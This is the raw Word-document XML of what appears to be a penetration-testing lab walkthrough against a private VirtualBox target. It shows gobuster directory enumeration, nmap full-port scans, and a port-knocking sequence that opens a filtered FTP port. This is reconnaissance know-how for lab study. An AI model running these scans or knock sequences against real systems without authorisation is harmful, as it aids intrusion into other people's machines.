          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-[</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="6EA5477B" w14:textId="0DC6A69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└─$ </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:hyperlink r:id="Rf047833083bc4bdc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</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/common.txt -x </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>html,php,txt</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 50 -b 404,502,503,403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="4A935116" w14:textId="5209E2F1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32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="49A31F70" w14:textId="0531183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Gobuster</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> v3.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="43128E47" w14:textId="0858A91D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by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="58364A9F" w14:textId="3D015F3E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32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="2F5181C2" w14:textId="189EC4C2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color w:val="082974" w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:                     </w:t>
      </w:r>
      <w:hyperlink r:id="Radfc4d9f78624317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</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="44C93E52" w14:textId="60C25FA1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[+] Method:                  GET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="19F61E9A" w14:textId="62FF3A7B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[+] Threads:                 50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="00F9EF1C" w14:textId="29973FE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[+] Wordlist:                /</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="06FB714A" w14:textId="7B7A2296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[+] Negative Status codes:   404,502,503,403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="518635C5" w14:textId="14429FF2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[+] User Agent:              </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/3.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="728222E2" w14:textId="2921C5B3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[+] Extensions:              </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>html,php,txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="2B794F87" w14:textId="1C3B8BE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[+] Timeout:                 10s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="6B050FD7" w14:textId="091950B9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32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="7C834E2B" w14:textId="752D0690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2023/05/31 20:51:59 Starting </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in directory enumeration mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="496162D2" w14:textId="426F1F73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32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="7CC0721A" w14:textId="18475FD2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css</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      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 xml:space="preserve">Status: 301) [Size: 314] [--&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R9f8479b058944410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http://192.168.243.24/css/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="73CA5EAD" w14:textId="01D072BD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/deployment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 xml:space="preserve">Status: 301) [Size: 321] [--&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R8ded674d26b64054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http://192.168.243.24/deployment/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="6DA10572" w14:textId="510E7176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home.php</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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 xml:space="preserve">Status: 302) [Size: 158] [--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="5313B0A6" w14:textId="787B42BA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/images   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 xml:space="preserve">Status: 301) [Size: 317] [--&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R19676e2eaa234fcd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http://192.168.243.24/images/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="03634E99" w14:textId="2AEA9EB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index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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>Status: 200) [Size: 927]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="6B969356" w14:textId="3A9C3377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index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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>Status: 200) [Size: 927]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="40515E21" w14:textId="236200F9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login.php</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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>Status: 200) [Size: 1801]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="371437D3" w14:textId="31A62C2F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/manual   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 xml:space="preserve">Status: 301) [Size: 317] [--&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="Rb58e9eb8f49746fd">
        <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://192.168.243.24/manual/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="65E792A5" w14:textId="72CF3B00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 xml:space="preserve">/no.html    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>Status: 200) [Size: 157]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="693DEE8B" w14:textId="7BBCAD34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/</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>welcome.php</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Status: 200) [Size: 935]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="1FC1963B" w14:textId="65E0F74A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Progress: 18456 / 18460 (99.98%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="33F86133" w14:textId="7DEBFE46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32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="3DEA3022" w14:textId="7EB73A92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2023/05/31 20:52:04 Finished</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="2E8946DA" w14:textId="307E24B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===============================================================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="31D2A251" w14:textId="01426FB2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37B42610" w14:textId="4CCBDAB1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32B096B6" w:rsidP="51CB6664" w:rsidRDefault="32B096B6" w14:paraId="0BDF4A60" w14:textId="46F8EE0F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32B096B6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>KNOCKING THE PORT 1234,5678,9012 USING NMAP sequence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="0AF0CE70" w14:textId="2420644F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67750186" w14:textId="4CB5047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┌──(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altamash㉿kali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)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-[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~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="6AD285A0" w14:textId="4FABB7E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└─$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-p- -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sV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192.168.243.24 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="4925848D" w14:textId="6146219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Starting Nmap 7.93 (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https://nmap.org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) at 2023-05-31 20:54 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="191FC820" w14:textId="68D5DBD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 scan report for 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="68B5CAC1" w14:textId="40093AE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Host is up (0.0034s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="63F88A41" w14:textId="3032964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Not shown: 65531 closed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ports (conn-refused)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="01CC92F2" w14:textId="5C8571B3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PORT    STATE    SERVICE     VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="25638045" w14:textId="60A21A1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21/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filtered ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="4004ED20" w14:textId="55DF089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80/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open     http        Apache httpd 2.4.18 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="1088B619" w14:textId="2E69861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139/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open    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netbios-ssn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Samba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smbd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3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="40911629" w14:textId="72DEDA8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445/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open    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netbios-ssn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Samba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smbd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3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="760A00DF" w14:textId="1514EB5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Service Info: Host: LINUXLITE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="6157BB5F" w14:textId="48601C2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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="26F8FDA2" w14:textId="0035701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Service detection performed. Please report any incorrect results at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https://nmap.org/submit/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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="71B02C7A" w14:textId="13778693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 done: 1 IP address (1 host up) scanned in 13.62 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="0C35D15E" w14:textId="5664154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17A645DA" w14:textId="1FC8E4CE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77322869" w14:textId="30A28461">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="6683AE2F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>Where we can see the p21 is still in the filtered state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="121BFA47" w14:textId="26EE2706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032CBD1B" w14:textId="2AF6CEDF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="6683AE2F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>Command for knocking:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="199B1A5E" w14:textId="783FE872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┌──(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root㉿kali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)-[/home/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altamash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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="10588437" w14:textId="1AB098AE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└─#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-p 1234,5678,9012 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="5C82FAE6" w14:textId="0A2C273B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Starting Nmap 7.93 (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https://nmap.org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) at 2023-05-31 20:56 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="5936EC08" w14:textId="20A9E06E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 scan report for 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="08C18D53" w14:textId="3A0ABE8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Host is up (0.00022s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="7A6E5C68" w14:textId="3D7A5EA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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="6071AE9D" w14:textId="37B816F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PORT    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STATE  SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="424DD47C" w14:textId="1D77E862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1234/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closed hotline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="384A71EB" w14:textId="229E199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5678/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closed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rrac</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="597C990B" w14:textId="146BDF2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9012/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closed unknown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="079BEC7D" w14:textId="2DCD6D63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MAC Address: 08:00:27:BD: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32:FA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(Oracle VirtualBox virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="0B7BEC7A" w14:textId="054EFF4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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="00B7FB27" w14:textId="7516AEF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 done: 1 IP address (1 host up) scanned in 0.29 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="793C89D8" w14:textId="2FACE39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331285ED" w14:textId="6A7D639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63575895" w14:textId="5FFD27DC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0010D8A1" w14:textId="0525D00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                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="59BE3803" w14:textId="4465EB91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┌──(root㉿kali)-[/home/altamash]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="0B81673E" w14:textId="7D432520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└─# nmap 192.168.243.24                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="1D8B1E59" w14:textId="5A299F13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Starting Nmap 7.93 (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https://nmap.org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) at 2023-05-31 20:56 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="556075AD" w14:textId="64080569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Nmap scan report for 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="0879C4ED" w14:textId="6F797B6C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Host is up (0.00029s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="5B2D0E29" w14:textId="21360FEB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Not shown: 996 closed tcp ports (reset)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="3FA0B9DB" w14:textId="4D0B795D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PORT    STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="5094A8C7" w14:textId="0058A740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  <w:t>21/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  <w:t>tcp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  <w:t xml:space="preserve">  open  ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6683AE2F" w:rsidP="51CB6664" w:rsidRDefault="6683AE2F" w14:paraId="4F756D0B" w14:textId="4F77A643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80/tcp  open  http</w:t>
      </w:r>
    </w:p>
